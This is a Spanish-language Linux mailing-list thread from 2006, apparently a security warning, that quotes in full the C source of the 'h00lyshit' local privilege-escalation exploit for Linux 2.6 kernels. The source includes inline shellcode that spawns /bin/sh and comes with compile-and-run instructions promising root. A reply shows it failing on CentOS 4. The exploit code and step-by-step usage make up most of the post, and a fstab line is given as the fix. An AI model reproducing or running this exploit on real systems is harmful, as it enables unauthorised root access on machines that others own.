aviso de seguridad - importante ver EXPLOIT adjunto

dblackbeer dblackbeer en gmail.com
Mie Jul 19 17:54:03 CLT 2006


2006/7/19, Felipe Tornvall <lpct en pctools.cl>:
> hola lista.... arreglar fstab
>
>
>
> proc            /proc           proc    defaults        0       0
>
> agregarlo en la primera línea... si ya está, no hay de qué preocuparse
> prueba:
> crear un archivo de ~100 MB en la home del usuario
> yes > xxx
> luego compilar
> gcc -o archivo source.c
> ejecutar
> ./archivo xxx
> y listo !! estas como root
>
> bajo amd64 no corre, pero sí me funcionó en un sarge i386; en los instalados
> hace una semana no pasa nada... (vía net install)
>
>
> *
> ** Author: h00lyshit
> ** Vulnerable: Linux 2.6 ALL
> ** Type of Vulnerability: Local Race
> ** Tested On : various distros
> ** Vendor Status: unknown
> **
> ** Disclaimer:
> ** In no event shall the author be liable for any damages
> ** whatsoever arising out of or in connection with the use
> ** or spread of this information.
> ** Any use of this information is at the user's own risk.
> **
> ** Compile:
> ** gcc h00lyshit.c -o h00lyshit
> **
> ** Usage:
> ** h00lyshit <very big file on the disk>
> **
> ** Example:
> ** h00lyshit /usr/X11R6/lib/libethereal.so.0.0.1
> **
> ** if y0u dont have one, make big file (~100MB) in /tmp with dd
> ** and try to junk the cache e.g. cat /usr/lib/* >/dev/null
> **
> */
>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
> #include <fcntl.h>
> #include <errno.h>
> #include <sched.h>
> #include <sys/types.h>
> #include <sys/stat.h>
> #include <sys/prctl.h>
> #include <sys/mman.h>
> #include <sys/wait.h>
> #include <linux/a.out.h>
> #include <asm/unistd.h>
>
>
> static struct exec ex;
> static char *e[256];
> static char *a[4];
> static char b[512];
> static char t[256];
> static volatile int *c;
>
>
> /*      h00lyshit shell code            */
> __asm__ ("      __excode:       call    1f                      \n"
>          "      1:              mov     $23, %eax               \n"
>          "                      xor     %ebx, %ebx              \n"
>          "                      int     $0x80                   \n"
>          "                      pop     %eax                    \n"
>          "                      mov     $cmd-1b, %ebx           \n"
>          "                      add     %eax, %ebx              \n"
>          "                      mov     $arg-1b, %ecx           \n"
>          "                      add     %eax, %ecx              \n"
>          "                      mov     %ebx, (%ecx)            \n"
>          "                      mov     %ecx, %edx              \n"
>          "                      add     $4, %edx                \n"
>          "                      mov     $11, %eax               \n"
>          "                      int     $0x80                   \n"
>          "                      mov     $1, %eax                \n"
>          "                      int     $0x80                   \n"
>          "      arg:            .quad   0x00, 0x00              \n"
>          "      cmd:            .string         \"/bin/sh\"     \n"
>          "      __excode_e:     nop                             \n"
>          "      .global         __excode                        \n"
>          "      .global         __excode_e                      \n"
>         );
>
>
>
> extern void (*__excode) (void);
> extern void (*__excode_e) (void);
>
>
> void
> error (char *err)
> {
>   perror (err);
>   fflush (stderr);
>   exit (1);
> }
>
>
> /*      exploit this shit       */
> void
> exploit (char *file)
> {
>   int i, fd;
>   void *p;
>   struct stat st;
>
>   printf ("\ntrying to exploit %s\n\n", file);
>   fflush (stdout);
>   chmod ("/proc/self/environ", 04755);
>   c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0,
> 0);
>   memset ((void *) c, 0, 4096);
>
>   /*      slow down machine       */
>   fd = open (file, O_RDONLY);
>   fstat (fd, &st);
>   p =
>     (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
>   if (p == MAP_FAILED)
>     error ("mmap");
>   prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
>   sprintf (t, "/proc/%d/environ", getpid ());
>   sched_yield ();
>   execve (NULL, a, e);
>   madvise (0, 0, MADV_WILLNEED);
>   i = fork ();
>
>   /*      give it a try           */
>   if (i)
>     {
>       (*c)++;
>       !madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise");
>       prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
>       sched_yield ();
>     }
>   else
>     {
>             nice(10);
>             while (!(*c));
>                 sched_yield ();
>       execve (t, a, e);
>       error ("failed");
>     }
>
>   waitpid (i, NULL, 0);
>   exit (0);
> }
>
>
> int
> main (int ac, char **av)
> {
>   int i, j, k, s;
>   char *p;
>
>   memset (e, 0, sizeof (e));
>   memset (a, 0, sizeof (a));
>   a[0] = strdup (av[0]);
>   a[1] = strdup (av[0]);
>   a[2] = strdup (av[1]);
>
>   if (ac < 2)
>     error ("usage: binary <big file name>");
>   if (ac > 2)
>     exploit (av[2]);
>   printf ("\npreparing");
>   fflush (stdout);
>
>   /*      make setuid a.out       */
>   memset (&ex, 0, sizeof (ex));
>   N_SET_MAGIC (ex, NMAGIC);
>   N_SET_MACHTYPE (ex, M_386);
>   s = ((unsigned) &__excode_e) - (unsigned) &__excode;
>   ex.a_text = s;
>   ex.a_syms = -(s + sizeof (ex));
>
>   memset (b, 0, sizeof (b));
>   memcpy (b, &ex, sizeof (ex));
>   memcpy (b + sizeof (ex), &__excode, s);
>
>   /*      make environment        */
>   p = b;
>   s += sizeof (ex);
>   j = 0;
>   for (i = k = 0; i < s; i++)
>     {
>       if (!p[i])
>         {
>           e[j++] = &p[k];
>           k = i + 1;
>         }
>     }
>
>   /*      reexec                  */
>   getcwd (t, sizeof (t));
>   strcat (t, "/");
>   strcat (t, av[0]);
>   execve (t, a, e);
>   error ("execve");
>   return 0;
> }
>
>
>
> --
> _______________________________________________
> Felipe Tornvall N.              lu: 400327
> w: http://freeby.pctools.cl
> w: http://docs.pctools.cl
> w: http://linux.pctools.cl
>
>
>

en CentOS 4 me dice esto:

[cosechero en maquina ~]$ ll xxx
-rw-rw-r--  1 gerardo gerardo 720244736 jul 19 18:51 xxx
[cosechero en maquina ~]$ ./archivo xxx

preparing
trying to exploit xxx

failed: Exec format error
[cosechero en maquina ~]$


-- 
cosechero

